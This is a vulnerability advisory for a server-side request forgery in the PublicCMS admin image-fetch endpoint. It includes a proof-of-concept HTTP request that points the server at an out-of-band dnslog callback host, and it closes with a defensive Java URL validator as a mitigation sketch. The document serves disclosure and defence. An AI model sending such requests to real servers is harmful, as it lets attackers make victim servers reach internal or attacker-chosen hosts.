Vulnerable product: PublicCMS
Vulnerable version: <=V4.0.202302.e
Vulnerability type: SSRF (server-side request forgery)
Vulnerability details:
1. Locate `com.publiccms.controller.admin.sys.UeditorAdminController#catchimage`. When this handler receives the `file[]` parameter, it issues a server-side request to each address supplied in that parameter, so an SSRF vulnerability exists.
![Image description](https://foruda.gitee.com/images/1720065022267836187/b5f57d55_13737655.png "Screenshot")
2. Construct a PoC. The endpoint can only be triggered after logging in, so the `Cookie` header must be replaced with a valid admin session.
```http
POST /admin/ueditor?action=catchimage HTTP/1.1
Host: localhost:8080
Connection: close
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
Cookie: xxxxxx

file[]=http://xxoxx.zqhbdv.dnslog.cn
```
![Image description](https://foruda.gitee.com/images/1720065080882623898/bed95682_13737655.png "Screenshot")
![Image description](https://foruda.gitee.com/images/1720065101775463384/df51868a_13737655.png "Screenshot")
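Mitigation sketch, added here as an example and not PublicCMS's own code: a hypothetical `RemoteImageUrlPolicy.validate` that a catchimage-style handler would call on every `file[]` value before fetching it. It assumes the handler can be made to connect to the returned address (keeping the original hostname in the `Host` header) instead of re-resolving the name.

```java
import java.net.Inet6Address;
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.Set;

// Hypothetical validator for a "fetch remote image by URL" handler such as catchimage.
// Rejects schemes other than http/https and any hostname that resolves to an
// internal address, which is the class of target an SSRF is used to reach.
public final class RemoteImageUrlPolicy {

    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    /** Returns the address the fetcher must connect to, or throws if the URL is not acceptable. */
    public static InetAddress validate(String rawUrl) {
        final URI uri;
        try {
            uri = new URI(rawUrl);
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("malformed URL");
        }
        String scheme = uri.getScheme();
        if (scheme == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase())) {
            throw new IllegalArgumentException("scheme not allowed: " + scheme); // blocks file:, gopher:, ...
        }
        String host = uri.getHost();
        if (host == null || uri.getUserInfo() != null) {
            throw new IllegalArgumentException("missing host or embedded credentials");
        }
        InetAddress[] addrs;
        try {
            addrs = InetAddress.getAllByName(host); // IPv4-mapped IPv6 comes back as Inet4Address
        } catch (UnknownHostException e) {
            throw new IllegalArgumentException("host does not resolve");
        }
        // Every resolved address must be public; a single internal record is enough to reject.
        for (InetAddress a : addrs) {
            boolean ula = a instanceof Inet6Address && (a.getAddress()[0] & 0xfe) == 0xfc; // fc00::/7
            if (a.isLoopbackAddress() || a.isSiteLocalAddress() || a.isLinkLocalAddress() // 169.254/16 incl. metadata
                    || a.isAnyLocalAddress() || a.isMulticastAddress() || ula) {
                throw new IllegalArgumentException("resolves to internal address: " + a.getHostAddress());
            }
        }
        // The caller must connect to this address, not re-resolve the name, otherwise a DNS
        // rebinding between check and fetch defeats the check.
        return addrs[0];
    }
}
```

A per-host allowlist of permitted image origins is stricter than this denylist and is preferable where the feature only needs to pull from known CDNs.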